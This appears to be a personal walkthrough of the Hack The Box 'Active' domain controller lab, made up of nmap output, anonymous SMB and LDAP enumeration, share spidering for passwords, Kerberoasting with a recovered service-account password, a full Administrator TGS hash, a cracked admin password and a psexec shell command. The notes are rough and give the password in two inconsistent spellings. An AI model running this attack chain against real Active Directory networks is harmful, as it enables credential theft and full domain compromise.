Skip to main content

Active AD machine HTB

Start

Scanning by nmap

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-11-24 03:13:43Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-11-24T03:14:39
 work   0 VPN  1 code  2 vscode  3 newZSH  4 bloodhound  5 zsh  6 code  7 win7  8 zsh  9 zsh-  10 code* 

Enumerate

lika@learning:~/Downloads/CVE-2024-8353$ netexec smb $IP
[*] Adding missing option 'check_guest_account' in config section 'nxc' to nxc.conf
[*] Adding missing section 'BloodHound-CE' to nxc.conf
[*] Adding missing option 'bhce_enabled' in config section 'BloodHound-CE' to nxc.conf
SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)

netexec smb $target -u '' -p '' --users netexec smb $target -u '' -p '' --rid-brute netexec smb $target -u 'guest' -p '' --rid-brute netexec ldap $target -u 'guest' -p '' --users netexec ldap $target -u 'guest' -p '' --rid-brute netexec ldap $target -u '' -p '' --user'

Add domain to host

rpcclient -U "" -N $target enumdomusers

netexec smb $target -u '' -p '' --shares

smbclient -L //$target//

netexec smb $target -u '' -p '' --shares -M spider_plus -o DOWNLOAD_FLAG=True

SMB         10.10.10.100    445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False) (Null Auth:True)
SMB         10.10.10.100    445    DC               [+] active.htb\:
SPIDER_PLUS 10.10.10.100    445    DC               [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.100    445    DC               [*]  DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.100    445    DC               [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.10.100    445    DC               [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.100    445    DC               [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.100    445    DC               [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.100    445    DC               [*]  OUTPUT_FOLDER: /home/lika/.nxc/modules/nxc_spider_plus
SMB         10.10.10.100    445    DC               [*] Enumerated shares
SMB         10.10.10.100    445    DC               Share           Permissions     Remark
SMB         10.10.10.100    445    DC               -----           -----------     ------
SMB         10.10.10.100    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.100    445    DC               C$                              Default share
SMB         10.10.10.100    445    DC               IPC$                            Remote IPC
SMB         10.10.10.100    445    DC               NETLOGON                        Logon server share
SMB         10.10.10.100    445    DC               Replication     READ
SMB         10.10.10.100    445    DC               SYSVOL                          Logon server share
SMB         10.10.10.100    445    DC               Users
SPIDER_PLUS 10.10.10.100    445    DC               [+] Saved share-file metadata to "/home/lika/.nxc/modules/nxc_spider_plus/10.10.10.100.json".
SPIDER_PLUS 10.10.10.100    445    DC               [*] SMB Shares:           7 (ADMIN$, C$, IPC$, NETLOGON, Replication, SYSVOL, Users)
SPIDER_PLUS 10.10.10.100    445    DC               [*] SMB Readable Shares:  1 (Replication)
SPIDER_PLUS 10.10.10.100    445    DC               [*] Total folders found:  22
SPIDER_PLUS 10.10.10.100    445    DC               [*] Total files found:    7
SPIDER_PLUS 10.10.10.100    445    DC               [*] File size average:    1.16 KB
SPIDER_PLUS 10.10.10.100    445    DC               [*] File size min:        22 B
SPIDER_PLUS 10.10.10.100    445    DC               [*] File size max:        3.63 KB
SPIDER_PLUS 10.10.10.100    445    DC               [*] File unique exts:     4 (inf, xml, pol, ini)
SPIDER_PLUS 10.10.10.100    445    DC               [*] Downloads successful: 7
SPIDER_PLUS 10.10.10.100    445    DC               [+] All files processed successfully.

look at this "/home/lika/.nxc/modules/nxc_spider_plus/10.10.10.100.json" grep -ri 'pass' /path

impacket-GetUserSPNs -dc-ip $target 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -request

impacket-GetUserSPNs -dc-ip $target 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -request

sudo timedatectl set-ntp false sudo date -s "7 hours 31 minutes"

Set timezone lai moi lay dc hash

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$62052e4bf360589965e07dce490489e0$92611f7e9dcb3bb29f5102625f236e8543aeeb3c4250d589b3ffd757963d377007a3a1afe19483137daa2ee3d1001d21d19281d96ddbabed333d6ef2e7cf1002e4362827053e5942c0a55659f5bb43f39e384ede336fe2440e6117169506a996c75befe091b5696d02102fae3e9f9a02d9dd72bf019b291b66c15728a056ec3727d4a5c5938b53e4f1a98ca879692a4564e07badd3eef34e3b73999f623112005d9642bd58e1ca8c3a74daadf43ad804cca25eaf980eedcb738f7ebf66c4bca7c0be29245f4c8481f81c98344f5551ecfa50ccf46a69b1af6b2b6f0263c8c84faf3fbf16bfcf86043480fceadaf3027b00acd5b109a0769752a469e5242733fe9554754c55dfec7e7d4d4b3a68a53ead7b4d5333df43d13a874138b56d48e5ded8bd16a3a16e037119a4d6800d6c0d946053cdaf28114d707797ab4bf0fe6aae5a3b35396c06959484a0b3b4a8dd4924cb40b2b894692e20a097e2d283df38f97c46b5585c7dd9593c9ecf48f47e33568c3167cf4b7a47bda3087acbef8e2f8bfc645dbaad66aa411c92ca80ad0570798a5372b0ff4416cf587baf164c1a6b547fca16e073a796e17fb78d9915b0013a65f5f6a7f64fdc30c770b383366bec5bd8a8d7c8e107ab19316d44053f4b49c1fe806549263b52ebce1a8a8e4a3dd0260425abcc2a11a127ab1ffd54b0f12103b84980ec129b77fd8850198e7c5e8a2202e50bd6c2bcfd847432e2e06814076953aea560efffabe3783600bfd0b93d335dae41eae6ce3a235cef4f5b41eae8ca8cfaf657c11a3630977156afc8173efb424fc0ba4d31ae7997d23936da65dd461a8756455e797be3122b9515f05289ef55cd6561c0d7e4c5a0367f17fe7e023fec4415280ce86a28cd06efbff99aef71d03cb52224349ae1c720d841622644543204f318c9adec8a2473313914dcb66a2a212bd14a1d11743b09515ae5b8ee4710dff93ec102b970f6645c4c093c5173551bd8f0f760c5a807ae66011da40fbe523634736906d5704d1c44ece270992fafcddf4cc12cb1b93262adfbef43b3ee81e9915483221c06705485a5989604133c20d2e85ce9f1d8be2b2c216edbf788ca601108f26c40ef7b0c17a05565864d95b6203641949f926f365197da88fff7a95aac83c7b41c48020a7efb032ae23279078e39cef4a65eab20e3b996ad9b21ae68fbf88cab7bd58b02e3d798f51facecd5b04b1db424e9340d97724a0c3c92c6073c3b10f2980472ac

netexec smb $target -u 'Administrator' -p 'Ticketmaster1968' netexec smb $target -u 'Administrator' -p 'Ticketmaster1968' --sam

rlwrap impacket-psexec active.htb/Administrator:Ticketmaster1986@$target

kill all job

for j in $(jobs | awk '{print $1}' | tr -d '[]'); do kill %$j; done